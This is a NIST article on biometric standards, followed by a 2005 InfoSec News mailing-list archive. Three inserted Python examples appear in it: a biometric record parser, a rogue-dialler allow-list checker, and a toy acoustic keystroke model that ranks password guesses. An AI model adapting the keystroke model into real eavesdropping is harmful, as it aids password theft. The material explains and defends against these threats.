The need for tests, measurements, reference data, and other technical tools to support the development of biometric technologies became more critical with threats to U.S. homeland security. The USA PATRIOT Act (Public Law 107-56) provides that other federal organizations work with NIST to "develop and certify a technology standard that can be used to verify the identity of persons applying for a United States visa . . ." The Enhanced Border Security Act (Public Law 107-71) spells out requirements for reviews of the effectiveness of biometric technology currently in use, and supports the development of new biometric technology for identification verification. Public Law 107-173, the Enhanced Border Security and Visa Entry Reform Act of 2002, established requirements for the development of a technology standard based on biometrics to verify the identity of persons applying for visas to the United States. Homeland Security Presidential Directive (HSPD) 12, issued in August 2004, called for the development of a mandatory, governmentwide standard for secure and reliable forms of identification for government employees and contractors.

NIST Studies and Investigations

NIST scientists and engineers have a great deal of experience in using computers to match images automatically.
There have been long-standing efforts to assist the law enforcement community in developing and improving automated methods for fingerprint matching, in evaluating facial recognition systems, and in acquiring information systems that support the Department of Justice's Automated Fingerprint Identification System (AFIS). Much work has been done to develop test data for use in evaluating automated optical character recognition (OCR), fingerprint classification and matching, and face recognition systems. The test data help both users and implementers of recognition systems in evaluating the effectiveness of these systems. A listing of publications and test data collections related to NIST's past and ongoing investigations and studies on the automated recognition of fingerprints, faces, and handwritten characters is available at: http://www.itl.nist.gov/iaui/894.03/pubs.html#fing In response to the USA PATRIOT Act and the Enhanced Border Security Act, NIST studied biometric technologies to evaluate their potential for enhancing border security. These evaluations examined applications that would positively identify visa applicants and verify that the holder of a visa is the person to whom the visa was issued. Fingerprint performance was measured on an Immigration and Naturalization Service (INS) database of 1.2 million prints of 620,000 individuals. Face Recognition Vendor Tests (FRVT) carried out in 2002 measured face recognition performance of ten vendors on a Department of State database of 121,000 images of 37,000 individuals. Based on the evaluations, as well as practical considerations about the amount of data that can be stored on a smart card, NIST recommended that at least two fingerprints be used to positively identify visa applicants and that a dual system of face and fingerprint recognition be used to verify the identities of visa holders at points of entry into the United States. 
The FRVT 2002 was supported by the Defense Advanced Research Projects Agency (DARPA), the Departments of Defense, Justice and State, and other federal agencies. A Fingerprint Vendor Technology Evaluation (FpVTE) conducted in 2003 evaluated the accuracy of fingerprint matching, identification, and verification systems. This evaluation was conducted by NIST on behalf of the Justice Management Division (JMD) of the U.S. Department of Justice to assess the capability of fingerprint systems in meeting the requirements for law enforcement matching systems, visitor and immigrant status programs, and implementer software development efforts. Multiple tests were performed with combinations of fingerprint data, such as single fingers, two index fingers, four to ten fingers, and with different types and qualities of operational fingerprints, such as flat live-scan images from visa applicants, multi-finger slap live-scan images from booking or background check systems, or rolled and flat inked fingerprints from law enforcement databases. The most accurate systems were found to have consistently low error rates across a variety of data sets. System accuracy was improved when four or more fingerprint images were used. The tests also showed that the most accurate fingerprint systems are more accurate than the most accurate facial recognition systems. Results are expected to form the basis for the design and acquisition of large-scale fingerprint identification systems, such as for entry and exit systems to the United States. More information about the evaluations is available at: http://www.frvt.org Biometric technologies are essential to the implementation of Federal Information Processing Standard (FIPS) 201, Personal Identity Verification (PIV) of Federal Employees and Contractors, which was developed in accordance with the requirements of HSPD 12 and approved in February 2005 by the Secretary of Commerce. 
FIPS 201 specifies the technical and operational requirements for interoperable PIV systems that supply PIV cards as identification credentials and that use the cards to authenticate an individual's identity. Draft NIST Special Publication (SP) 800-76, Biometric Data Specification for Personal Identity Verification, by Charles Wilson, Patrick Grother, and Ramaswamy Chandramouli, was developed to provide the technical specifications for the biometric data specified in FIPS 201. The publication details the technical requirements for capturing and formatting fingerprint and facial image information to be included on PIV cards. The technical requirements are based on voluntary industry standards, providing guidance for implementers when there are options in the standards that would interfere with interoperability if the options were to be implemented in different ways. Information about FIPS 201 and the PIV program at NIST is available at: http://csrc.nist.gov/piv-program/index.html Biometric Consortium The U.S. Biometric Consortium (BC), which has been meeting since 1995, includes more than 900 representatives from federal, state, and local governments, academia, and industry, who work together to coordinate and advance the development of biometric technologies. Over half of the participants in the consortium are from industry, and more than 60 federal agencies, including the executive departments and the military services, participate. The BC sponsors technology workshops, standards activities, and user activities to address research and technology evaluation efforts. The BC's annual conference, which is open to members and the general public, is now the largest biometric conference in the world. NIST and the National Security Agency (NSA) co-chair the Biometric Consortium. 
Information about BC activities is available on the website: http://www.itl.nist.gov/div893/biometrics/consortium.html Common Biometric Exchange Formats Framework (CBEFF) In 1999, the Biometric Consortium initiated the development of a common data format to facilitate the exchange and interoperability of biometric data. Industry and government representatives identified the need for a technology-blind biometric format that would facilitate the handling of different biometric types, versions, and biometric data structures in a common way. This common format would facilitate the exchange and interoperability of biometric data for all aspects of biometrics, independent of the particular vendor that generates the biometric data. The initial conceptual definition was achieved through a series of workshops co-sponsored by NIST and the Biometric Consortium. A technical development team led by NIST and NSA developed the Common Biometric Exchange File Format. It was published by NIST as NISTIR 6529, Common Biometrics Exchange File Format (CBEFF), in January 2001. An augmented and revised version of the CBEFF was issued as NISTIR 6529A, Common Biometric Exchange Formats Framework, in April 2004. The CBEFF describes a set of data elements necessary to support biometric technologies in a common way independently of the application and the domain of use, such as mobile devices, smart cards, protection of digital data, and biometric data storage. CBEFF facilitates biometric data interchange between different system components or between systems. It promotes interoperability of biometric-based application programs and systems, provides forward compatibility for technology improvements, and simplifies the software and hardware integration process. The CBEFF was augmented by the NIST/BC Biometric Interoperability, Performance and Assurance Working Group to incorporate a compliant smart card format, product identification (ID), and a CBEFF nested structure definition. 
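The three-part record that the CBEFF description above refers to (a standard biometric header carrying the format owner and format type, an opaque biometric data block, and an optional security block), together with the nested structure, can be exercised in code. The following is an added example, not code from NIST or from NISTIR 6529A: the field widths, the owner and type codes, and the use of HMAC-SHA256 as the security block are assumptions chosen for illustration and are not the standard's byte layout. What the example shows is the check a consumer of such records should make: every declared length is validated against the buffer before slicing, and a record that carries a security block is rejected, not silently accepted, when that block cannot be verified.

```python
import hashlib
import hmac
import struct

# Added example of a CBEFF-style record: SBH || BDB || SB. The field layout and the
# codes below are assumptions for this example, not the NISTIR 6529A / INCITS 398
# encoding; the header / data block / security block split and nesting are CBEFF's idea.
SBH_FMT = ">HHIH"                       # format owner, format type, BDB length, SB length
SBH_LEN = struct.calcsize(SBH_FMT)      # 10 bytes
MAC_LEN = hashlib.sha256().digest_size  # 32 bytes

OWNER_EXAMPLE = 0x0101                  # hypothetical format-owner code
TYPE_FINGER = 0x0001                    # hypothetical BDB format types
TYPE_FACE = 0x0002
TYPE_NESTED = 0x00FF                    # BDB is itself a sequence of records (nesting)


def encode(owner, ftype, bdb, key=None):
    """Return SBH || BDB || SB. With a key, SB is an HMAC-SHA256 over SBH || BDB."""
    sb_len = MAC_LEN if key is not None else 0
    sbh = struct.pack(SBH_FMT, owner, ftype, len(bdb), sb_len)
    sb = hmac.new(key, sbh + bdb, hashlib.sha256).digest() if key is not None else b""
    return sbh + bdb + sb


def decode_one(buf, offset=0, key=None):
    """Parse one record at buf[offset:]. Returns (owner, ftype, bdb, verified, next_offset).
    verified is True/False when an SB is present and None when the record carries no SB."""
    if len(buf) - offset < SBH_LEN:
        raise ValueError("truncated header")
    owner, ftype, bdb_len, sb_len = struct.unpack_from(SBH_FMT, buf, offset)
    end = offset + SBH_LEN + bdb_len + sb_len
    if end > len(buf):                      # declared lengths must fit inside the buffer
        raise ValueError("declared length exceeds buffer")
    sbh = buf[offset:offset + SBH_LEN]
    bdb = buf[offset + SBH_LEN:offset + SBH_LEN + bdb_len]
    sb = buf[offset + SBH_LEN + bdb_len:end]
    verified = None
    if sb_len:
        if key is None:
            verified = False                # cannot verify: unverified, never "trusted"
        else:
            expected = hmac.new(key, sbh + bdb, hashlib.sha256).digest()
            verified = hmac.compare_digest(expected, sb)
    return owner, ftype, bdb, verified, end


def flatten(buf, key=None, require_verified=True):
    """Walk the records in buf, recursing into nested BDBs, and return the leaf
    (owner, ftype, bdb) blocks. Rejects any record whose SB fails verification."""
    leaves, offset = [], 0
    while offset < len(buf):
        owner, ftype, bdb, verified, offset = decode_one(buf, offset, key)
        if require_verified and verified is False:
            raise ValueError("security block verification failed")
        if ftype == TYPE_NESTED:
            leaves.extend(flatten(bdb, key, require_verified))
        else:
            leaves.append((owner, ftype, bdb))
    return leaves


# Constructed sample data for the example (placeholders, not real biometric templates).
KEY = b"example-integrity-key"
FINGER_BDB = b"FMR\x00minutiae-placeholder"
FACE_BDB = b"FAC\x00face-image-placeholder"


def build_sample():
    """A nested record: one finger block and one face block, wrapped with an SB."""
    inner = encode(OWNER_EXAMPLE, TYPE_FINGER, FINGER_BDB) + encode(OWNER_EXAMPLE, TYPE_FACE, FACE_BDB)
    return encode(OWNER_EXAMPLE, TYPE_NESTED, inner, key=KEY)


def tampered_sample():
    """The same record with one bit flipped inside the nested BDB."""
    rec = bytearray(build_sample())
    rec[SBH_LEN + 5] ^= 0x01
    return bytes(rec)


if __name__ == "__main__":
    print(flatten(build_sample(), KEY))
    try:
        flatten(tampered_sample(), KEY)
    except ValueError as err:
        print("rejected:", err)
```

The security block here is a keyed MAC because the example only needs to show integrity checking; a deployment would use whatever the profile in force specifies (a signature, for instance), but the rule that an unverifiable block is a rejection rather than a pass does not change.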
The augmented CBEFF was submitted to the INCITS M1 committee for processing as a national standard and has been published as American National Standard INCITS 398-2005. The international version of CBEFF is in the last stages of development and is expected to become an ISO standard at the end of 2005. NISTIR 6529A is available at: http://www.itl.nist.gov/div893/biometrics/documents/NISTIR6529A.pdf Other Organizations Supporting Biometric Technology The National Biometric Security Project (NBSP) is an independent not-for-profit corporation, which supports non-defense government and private sector efforts to protect the security of the civil infrastructure from terrorist threats through the application of proven biometric technologies. More information is available at: http://www.nationalbiometric.org/nbsp.html The Department of Defense (DoD) Biometrics Management Office (BMO) is responsible for leading, consolidating, and coordinating the development, adoption, and use of biometric technologies for the Department of Defense to support the warfighter and enhance Joint Service interoperability. More information is available at: http://www.biometrics.dod.mil/ The BioAPI Consortium was founded to develop a biometric Application Programming Interface (API) to allow for platform and device independence to application programmers and biometric service providers. The BioAPI Consortium is a group of over 120 companies and organizations that have a common interest in promoting the growth of the biometrics market. The BioAPI Consortium developed a specification and reference implementation for a standardized API that is compatible with a wide range of biometric application programs and a broad spectrum of biometric technologies. 
More information is available at: http://www.bioapi.org/ The Biometric Interoperability, Performance and Assurance Working Group was established by NIST and the Biometric Consortium to broaden the utilization and acceptance of biometric technologies and to facilitate and encourage further exchange of information and collaborative efforts for biometrics between users and private industry. The Working Group (WG) supports the advancement of technically efficient and compatible biometrics technology solutions on a national and international basis. The WG addresses issues and efforts other than those efforts already under way in national or international organizations, such as formal standards bodies, industrial consortiums, and cooperative testing activities. In addition to developing the Common Biometric Exchange Formats Framework (the augmented and revised version of CBEFF), the WG developed a specification defining methods for biometric template protection and a biometric Application Programming Interface for Java Card. Support for Voluntary Standards Development NIST has contributed to the development of national and international standards for biometrics. These standards are considered to be critical for U.S. needs for homeland security, the prevention of identity theft, and for other government and commercial applications based on biometric personal authentication. These standards are essential for achieving the connectivity and interoperability of different systems and for assuring security. As an accredited standards developer, NIST/ITL has sponsored the development of voluntary industry standards for the interchange of fingerprints, facial data, and scar, mark and tattoo (SMT) data. For the past seven years and particularly since September 11, 2001, NIST has intensified its work in support of the development of biometric standards by working with consortia and other industry groups. 
NIST strongly backs national and international standards organizations as the best environments for the development of voluntary consensus standards for biometric technology and the deployment of standards-based solutions. Priorities for homeland security have been driving efforts to develop high performance interoperability standards for biometrics. Interest in standards for smart cards has also intensified. The chief U.S. venues for these standardization efforts are the InterNational Committee for Information Technology Standards (INCITS) Technical Committees M1, for biometrics, and B10, for smart cards. In addition to developing national standards, the M1 and B10 committees act as the U.S. technical advisory groups (TAGs) to subcommittees in International Organization for Standardization/ International Electrotechnical Commission (ISO/IEC) Joint Technical Committee 1 (JTC 1). INCITS M1 is the TAG to ISO/IEC JTC 1 Subcommittee 37 - Biometrics. INCITS B10 is the TAG to ISO/IEC JTC 1 SC 17 - Cards & Personal Identification. NIST contributes to the work of INCITS M1 and to JTC 1 SC 37 by providing leadership, including committee officers, technical editors, and other technical expertise. The committees' work includes the development of standards and specifications for biometric data formats for finger, facial, iris, and signature recognition; the development of application profiles for transportation workers, border crossing, and point-of-sale; and biometric performance evaluation and reporting methods. Since its first meeting in January 2002, the INCITS M1 committee has developed many needed biometric data interchange and interoperability standards, which have been approved as American National Standards Institute (ANSI) standards: seven biometric data interchange standards and two biometric application profiles. Two biometric interface standards (the BioAPI specification and the Common Biometric Exchange Formats Framework) were also approved by INCITS. 
In 2005 ISO approved and published four biometric data interchange standards that had been developed by JTC 1 SC 37. In the United States, large government organizations are adopting many of the INCITS biometric standards that have been approved as American National Standards. Large international organizations are adopting the international standards emerging from JTC 1 SC 37. Other standards that will contribute to the successful deployment of secure, interoperable, reliable, and cost-effective information systems are currently under development in these national and international standards groups. Voluntary industry standards to which NIST has made significant contributions include: * X9.84-2000, Biometrics Management and Security for the Financial Services Industry. This standard specifies the minimum security requirements for effective management of biometrics data for the financial services industry and security for the collection, distribution, and processing of biometrics data. * ANSI/NIST-ITL 1-2000, Data Format for the Interchange of Fingerprint, Facial, and Scar, Mark and Tattoo (SMT) Information. This standard revises and consolidates earlier standards developed by NIST to specify a common format for exchanging biometric data across jurisdictional lines or between dissimilar systems made by different manufacturers. Originally published as NIST Special Publication 500-245, the specifications were advanced to the status of national standards in accordance with ANSI procedures for the development of standards using the canvass method. Conformance Testing in Support of Users and Product Developers Standards-based, high-quality conformance testing helps both developers and users by validating conformance claims, leading to greatly increased levels of confidence in products. Testing can also help to ensure interoperability between standards-based products and systems. 
NIST and the Department of Defense (DoD) Biometrics Management Office (BMO) have been working in close collaboration in the development of biometric standards and supporting testing tools. For more than a year, NIST and the BMO have been independently developing implementations of BioAPI test tools. These test tools will support users within DoD and other government agencies already requiring, or intending to require in the near future, that Biometric Service Providers (BSPs) conform to the BioAPI standard. The test tools will enable the future establishment of conformity assessment programs to validate conformance to the BioAPI standard and other emerging standards, and will help product developers interested in developing products conforming to voluntary consensus biometric standards to use the same test tools available to users. NIST and the BMO are conducting intensive testing of the initial versions of the test tools to cross-validate the test results using a number of vendor BSPs that claim their products conform to the BioAPI standard. The initial test tool implementations were developed using concepts and principles specified in a draft conformance testing methodology standard that is currently under development in INCITS M1 committee. This documentary standard project was sponsored by NIST, the DoD BMO, the National Biometric Security Project (NBSP), Saflink Corp., and The Biometric Foundation (TBF). The NIST test tool implementation development was co-sponsored by the National Biometric Security Project. The principal developer is Saflink Corp. Conclusion After many years of involvement in biometric activities, NIST continues to investigate promising technologies and to advance the development of industry standards for biometrics. Although they are quite promising, biometric technologies are not the sole solution for controlling access to information or for verifying the identity of an individual. 
All biometric data must be protected appropriately, and biometric controls must be selected and used within an integrated security program that assesses risks to information and information systems, determines security requirements, and selects cost-effective management, operational, and technical controls. Disclaimer Any mention of commercial products or reference to commercial organizations is for information only; it does not imply recommendation or endorsement by NIST nor does it imply that the products mentioned are necessarily the best available for the purpose. Elizabeth B. Lennon Writer/Editor Information Technology Laboratory National Institute of Standards and Technology 100 Bureau Drive, Stop 8900 Gaithersburg, MD 20899-8900 Telephone (301) 975-2832 Fax (301) 975-2378 From isn at c4i.org Thu Sep 15 00:51:59 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:58:59 2005 Subject: [ISN] Web sites hosted by S. Korea's leading internet portal hacked Message-ID: http://english.yna.co.kr/Engnews/20050913/660000000020050913214344E8.html 2005/09/13 SEOUL, Sept. 13 (Yonhap) -- Unidentified computer hackers have attacked a score of Web sites hosted by Daum Communications Corp., South Korea's second most-popular Internet portal, causing a barrage of spam e-mail to their members, a computer security company said Tuesday. Multiple spam e-mails were simultaneously sent to members of some 20 community service Web sites hosted by Daum after the attacks the previous day, Geot said. The number of computer users affected by the hacking incident is estimated at several millions, as most of the Web sites that were hacked claim hundreds of thousands of members each. Daum said its computer servers were not affected and the chances are the hackers secured lists of e-mail addresses by attacking the personal computers of the Web sites' administrators. 
However, Geot said it cannot rule out the possibility the hackers attacked the Internet portal's computer system directly as only the Web sites with the largest number of members were attacked. Police computer forensics experts are currently investigating the circumstances behind the mass dissemination of spam e-mails, the two companies said. From isn at c4i.org Thu Sep 15 00:52:14 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:59:25 2005 Subject: [ISN] Microsoft chief of security hit by rogue dialler scam Message-ID: http://www.techworld.com/security/news/index.cfm?NewsID=4375 By Matthew Broersma Techworld 09 September 2005 Microsoft UK's recently appointed chief security advisor, Ed Gibson, has admitted to being hit by that lowliest of online scams - the rogue dialler. The scams are seen as mainly affecting the lowest rung of Internet users - beginners using dial-up connections without basic security software, such as a firewall, that would prevent infection or alert them to the dialler's activities. However, broadband users can also be affected via back-up modem connections. However, the problem clearly isn't limited to Internet newbies, Gibson reportedly said at a trade conference last week. A rogue dialler recently cost Gibson £450 in phone bills, which BT is insisting he pay. Gibson told attendees at London "eConfidence: Spam and Scams" conference that more must be done about the rogue dialler problem. It isn't clear how Gibson, a former senior FBI officer specialising in financial crime, was infected with the dialler software. Microsoft wasn't able to immediately comment. Rogue diallers secretly install code on a user's system causing modems to connect to the Internet via a premium-rate number, whose profits are siphoned off to the scammers. 
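An added example, not BT's or Microsoft's code: the control this article goes on to describe, a safe list of numbers the modem is allowed to dial, written as a check over a constructed log of modem dial commands. The regular expression for AT dial commands, the rule that UK premium-rate numbers begin with 09, the sample ISP number and the log lines are assumptions for the example. The point it makes is that the comparison has to be done on a normalised number: a dialler that writes the same premium-rate number in +44 or 00 44 form, with spaces and dashes, must not slip past an exact-match list.

```python
import re

# Added example: allow-list check on modem dial strings. Number formats, the 09
# premium-rate rule, the safe number and the log below are assumptions, not BT's tool.
SAFE_NUMBERS = {"08450798000"}             # constructed ISP dial-up number
PREMIUM_PREFIXES = ("09",)                 # UK premium-rate numbers start with 09 (assumed)
DIAL_RE = re.compile(r"^\s*ATD[TP]?\s*(?P<num>[0-9+#*,\s()-]+)\s*$", re.IGNORECASE)


def normalise(number):
    """Strip formatting and dial modifiers; fold +44 / 0044 into UK national format."""
    digits = re.sub(r"[^0-9+]", "", number)      # drop spaces, dashes, pause commas, brackets
    if digits.startswith("+44"):
        digits = "0" + digits[3:]
    elif digits.startswith("0044"):
        digits = "0" + digits[4:]
    return digits


def classify(command):
    """Return (verdict, normalised_number) for one modem command line.
    verdict: 'safe', 'premium', 'international', 'unknown' or 'not-a-dial'."""
    match = DIAL_RE.match(command)
    if not match:
        return "not-a-dial", None
    num = normalise(match.group("num"))
    if num in SAFE_NUMBERS:
        return "safe", num
    if num.startswith(PREMIUM_PREFIXES):
        return "premium", num
    if num.startswith("+") or num.startswith("00"):
        return "international", num               # not on the safe list, leaves the country
    return "unknown", num


# Constructed log of dial commands, as a modem or driver log might record them.
SAMPLE_LOG = [
    "ATDT 0845 079 8000",          # the user's ISP, on the safe list
    "ATDT0909 123 4567",           # domestic premium-rate number
    "ATDT +44 845 079 8000",       # same ISP number written internationally
    "ATDP 00 44 909 1234567",      # premium-rate number disguised as an international call
    "ATDT 0037 1234 5678",         # overseas number, not on the safe list
    "ATZ",                         # reset, not a dial command
]


def review(log):
    """Classify every line; anything other than 'safe' or 'not-a-dial' deserves an alert."""
    return [(line,) + classify(line) for line in log]


if __name__ == "__main__":
    for line, verdict, num in review(SAMPLE_LOG):
        print(f"{verdict:14} {num!s:16} {line}")
```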
Public outrage over the scams reached a high level about a year ago, and in recent weeks BT, the premium-rate regulator and the government have begun taking action to protect users, punish rogue dialler scammers more harshly, and to make it more difficult for scammers to get at premium-rate funds. ICSTIS, the regulator of premium-rate services in the UK, last month announced that telephone providers will now be forced to delay transferring funds to premium-rate number holders for 30 days. The measure is expected to make it harder for the scams to operate. Previously number operators were paid within a couple of days. In June, the government announced that rogue dialler scammers could face fines of up to £250,000 under new government proposals backed by ICSTIS. BT, for its part, earlier this year introduced free software called Modem Protection designed to stop rogue diallers. The software alerts users whenever the computer attempts to dial a number not on the user's "safe" list. Gibson started with Microsoft in July, after 20 years in senior positions with the FBI. He has served as the FBI's assistant legal attaché in the UK for the past five years, before which he spent 15 years as an investigating agent specialising in asset tracing and confiscation, money laundering, intellectual property theft and financial crime. Over the past five years Gibson has become known in the UK for his cybercrime lectures, beginning each lecture wearing dark glasses. Gibson reports to Nick McGrath, head of platform strategy for Microsoft UK. He replaced the more technically-oriented Stuart Okin, who left Microsoft for Accenture last year. From isn at c4i.org Thu Sep 15 00:49:01 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:59:58 2005 Subject: [ISN] Can Spies Decipher Keyboard Clicks? 
Message-ID: http://www.pcworld.com/news/article/0,aid,122541,00.asp Robert McMillan IDG News Service September 14, 2005 Researchers at the University of California, Berkeley, have found a way to turn the clicks and clacks of typing on a computer keyboard into a startlingly accurate transcript of what exactly is being typed. In a paper released last week, the researchers explained how they developed software that could analyze the sound of someone typing on a keyboard for just ten minutes and then piece together as much as 96 percent of what had been typed. The technique works because of the simple fact that the sound of someone striking an "a" key is different from the sound of striking the "t," according to Doug Tygar, a professor of computer science at Berkeley. "Think of a conga drum. If you hit a conga drum on different parts of the skin, it makes a different tone," he said. "That's an analogy for what's happening here, because there's a plate underneath the keyboard [that is] being struck in different locations." The Tones Tell Once the different tones were identified, Tygar and his team used techniques from a field of research called statistical learning theory to map them into similar categories and arrive at some early guesses at what the text might be. They then applied a number of spelling and grammar correction tools to this text to refine those guesses. This process ultimately converts the keyboard sounds into readable text. Statistical learning, also called machine learning, provides a way for computers to make sense out of complex pieces of data. It has been a hot area for computer science research over the last ten years, forming the basis for products such as spam detectors and speech recognition systems, Tygar said. Because the Berkeley researchers' technique is based on the sound of the key and not the timing of the keystrokes, typing by both touch and hunt-and-peck typists can be decoded using this technique. 
The idea of snooping via keyboards has been around since the beginning of the Cold War, when Soviet spies bugged IBM Selectric typewriters in the American embassy in Moscow. Keystroke-logging devices have also been around for some time. But the Berkeley researchers are breaking new ground in using these techniques with computer keyboards, said Bruce Schneier, chief technology officer at Counterpane Internet Security and the author of Applied Cryptography. "In security, the devil is in the details, and these guys did the details," he said. Too Simple to be Safe Some details remain unsolved, however. The researchers did not use certain commonly used keys such as "shift" and "backspace" in their study, and they only looked at text that was typed in English. Still, neither Schneier nor Tygar believe that these details will prevent the techniques from ultimately working in uncontrolled environments. In fact, Schneier believes it is only a matter of time before criminals begin using similar techniques. "Somebody else will use it," he said. "And if you believe the [National Security Agency] hasn't done this already, you're naive." Tygar agrees that the techniques described in his paper are relatively easy; his team used open-source spell-checkers and a $10 PC microphone, for example. And for that reason, the Berkeley team has decided not to release the source code used in the study. "I don't think it's very hard for people to put this together, but I don't want to make it easy for people, either," Tygar says. Rock on for Security So, what should computer users make of this new security threat? Tygar says that one lesson to be drawn is that even randomly generated passwords are not secure. His researchers were able to guess 90 percent of all randomly generated five-character passwords within 20 tries using these techniques, he said. "We probably don't want to be relying on passwords as we do," he said. 
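As an added illustration, not code from the Berkeley paper or its authors: a toy model of the side channel described above. It assumes each key has a fixed feature vector (standing in for the spectral features extracted from a recording) and that a captured keystroke is that vector plus ambient noise; the signatures, the Gaussian noise model, the sample text and the password are constructed. Unlike the paper, which recovers key labels without training data by clustering and then applying a language model, this model is supervised, so it overstates the attacker's starting position. What it shows are the two points in the article that matter to a defender: per-keystroke likelihoods combine into a ranked list of whole-password guesses, which is why a random five-character password falls within a handful of tries, and raising the noise level degrades the transcript.

```python
import itertools
import math
import random
import string

# Added example: toy acoustic keystroke model. Every key has a constructed "signature"
# feature vector; a recorded keystroke is that vector plus Gaussian ambient noise.
# Assumes a labelled model (supervised), unlike the unsupervised pipeline in the paper.
DIM = 12
KEYS = string.ascii_lowercase
_rng = random.Random(2005)
SIGNATURES = {k: [_rng.gauss(0.0, 1.0) for _ in range(DIM)] for k in KEYS}


def record_keystroke(key, noise_sd, rng):
    """Simulate the features recovered from one recorded keystroke."""
    return [v + rng.gauss(0.0, noise_sd) for v in SIGNATURES[key]]


def key_log_posteriors(features, noise_sd):
    """Return (key, log posterior) for every key, most likely first, under an
    isotropic Gaussian noise model with a uniform prior over keys."""
    loglik = {}
    for k, sig in SIGNATURES.items():
        d2 = sum((f - s) ** 2 for f, s in zip(features, sig))
        loglik[k] = -d2 / (2.0 * noise_sd ** 2)
    m = max(loglik.values())
    log_z = m + math.log(sum(math.exp(v - m) for v in loglik.values()))
    return sorted(((k, v - log_z) for k, v in loglik.items()), key=lambda kv: -kv[1])


def transcribe(text, noise_sd, seed=0):
    """Best-guess transcript: the most likely key for each recorded keystroke."""
    rng = random.Random(seed)
    out = []
    for ch in text:
        if ch not in SIGNATURES:
            out.append(ch)                 # non-letter keys were out of scope in the study
            continue
        out.append(key_log_posteriors(record_keystroke(ch, noise_sd, rng), noise_sd)[0][0])
    return "".join(out)


def accuracy(typed, recovered):
    """Fraction of letter keystrokes recovered correctly."""
    pairs = [(a, b) for a, b in zip(typed, recovered) if a in SIGNATURES]
    return sum(a == b for a, b in pairs) / len(pairs)


def password_rank(password, noise_sd, beam=5, seed=0):
    """Rank whole-password guesses by the summed per-key log posteriors (top `beam`
    keys per position). Returns the 1-based rank of the true password, or None."""
    rng = random.Random(seed)
    per_pos = [key_log_posteriors(record_keystroke(c, noise_sd, rng), noise_sd)[:beam]
               for c in password]
    guesses = [("".join(k for k, _ in combo), sum(lp for _, lp in combo))
               for combo in itertools.product(*per_pos)]
    guesses.sort(key=lambda g: -g[1])
    for rank, (guess, _) in enumerate(guesses, 1):
        if guess == password:
            return rank
    return None


if __name__ == "__main__":
    text = "the quick brown fox jumps over the lazy dog"   # constructed sample text
    for sd in (0.2, 1.0, 3.0):
        print(f"noise {sd}: accuracy {accuracy(text, transcribe(text, sd)):.2f}")
    print("rank of random password at low noise:", password_rank("qzkxv", 0.2))
```

Two things to read off the model: the password ranking needs no dictionary at all, so the usual "random passwords are safe" intuition does not apply once the per-key signal is available; and the only parameter the victim controls is noise_sd, which is the article's "turn up the background noise" advice in quantitative form.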
There is, however, one easy step that users can take to mitigate this type of attack: Turn up the background noise. "In more noisy environments with different kinds of sounds, like music and human voices, all mixed up together, it could be pretty difficult to separate the keyboard sounds from other sounds," said Li Zhuang, one of the Berkeley computer science students who coauthored the paper. So people looking to rock out at work now have an excuse, Zhuang said. "I think playing music will make this attack much, much harder to do," she said. "Now you have a good reason to do this." The team has posted a "preprint" abstract of its paper, which will be presented in November at the Association for Computing Machinery Conference on Computer and Communications Security, in Alexandria, Virginia. From isn at c4i.org Thu Sep 15 00:49:13 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 01:00:31 2005 Subject: [ISN] Dilbert infosec humor Message-ID: Just in case you missed it... http://www.dilbert.com/comics/dilbert/archive/dilbert-20050912.html - WK From isn at c4i.org Fri Sep 16 05:02:24 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:08:22 2005 Subject: [ISN] Techies don't get security either Message-ID: http://www.theregister.co.uk/2005/09/15/gartner_security_risk/ By John Leyden 15th September 2005 Heads of information security functions are more likely to be business managers than techies in future as companies take a more strategic approach that balances IT security threats against business drivers. That's according to analyst house Gartner which predicts security will evolve into an element of a wider risk management strategy. It reckons the days of security people blocking projects without considering the wider picture are numbered. "Business lives by risk. But the concept of 'acceptable risk' is an oxymoron to many security professionals," said Paul Proctor, research vice president with Gartner's Information Security Group. 
He explained that large organisations thrive by having a developed understanding of risk, and by accepting it when it offers a business advantage. Instead of relying on the ability to scare budgets out of chief information security officers, a future risk management officer will be well-versed in communication and project management skills and more likely to have trained in business school than as a techie. This will leave technical staff unable to rise beyond a certain position in their company unless they get a business degree. "The ability to determine what constitutes risk, and the requirement to report that risk to executive decision makers, can be a highly political activity requiring excellent written and oral communication skills with a good knowledge of business. Generally, these skills have been lacking in traditional technically-oriented information security specialists," Proctor added. "The days of security being handled by the 'network person' who did security in their spare time are over and increasingly we are seeing seasoned professionals with real business experience and business school qualifications stepping into the security space." Business people also need to adapt and realise that security cannot be achieved by technology alone and needs to be built into a corporate culture. This will require cultural, behavioural, procedural and technical change, according to Gartner. Proctor made his comments during a presentation at the Gartner IT Security Summit in London on Wednesday.
From isn at c4i.org Fri Sep 16 05:02:37 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:08:45 2005 Subject: [ISN] Laptop with personal data of 98,000 recovered Message-ID: http://news.com.com/Laptop+with+personal+data+of+98%2C000+recovered/2100-1029_3-5867702.html By Reuters September 15, 2005 A stolen laptop computer holding personal information of more than 98,000 California university students and applicants has been recovered, but it's uncertain whether the information had been tapped, the University of California, Berkeley said on Thursday. The laptop, which stored names and Social Security numbers, disappeared in March from a restricted area of the university's graduate division offices, forcing the university to alert more than 98,000 students and applicants of the theft. The university said in a statement that a San Francisco man has been arrested and charged by the Alameda County district attorney with possession of stolen property after investigators discovered the laptop had been bought over the Internet by a man in South Carolina. "UC police note that while a lab analysis could not determine whether the sensitive campus data was ever accessed, nothing in their investigation points to identity theft nor individuals involved in identity theft. It appears...that the intent was simply to steal and sell a laptop computer," the university said in its statement. Forensic tests showed files on the laptop had been erased and written over with a new operating system installation, leaving only residual data and making it virtually impossible to determine whether password-protected files had been breached, the university said. "The San Francisco man who was arrested told police it is his practice to install a new operating system or erase and wipe clean old data from a computer before posting it for sale online," the university said. Story Copyright © 2005 Reuters Limited. 
From isn at c4i.org Fri Sep 16 05:03:26 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 16 05:09:00 2005
Subject: [ISN] Study: Security lacking at Test Site
Message-ID:

http://www.lasvegassun.com/sunbin/stories/lv-gov/2005/sep/15/519361083.html

By Benjamin Grove
SUN WASHINGTON BUREAU CHIEF
September 15, 2005

WASHINGTON -- Security is lacking at the nation's nuclear weapons sites, including the Nevada Test Site, according to a recent report, but government officials say many improvements already have been made since the inspections that were the basis for the report.

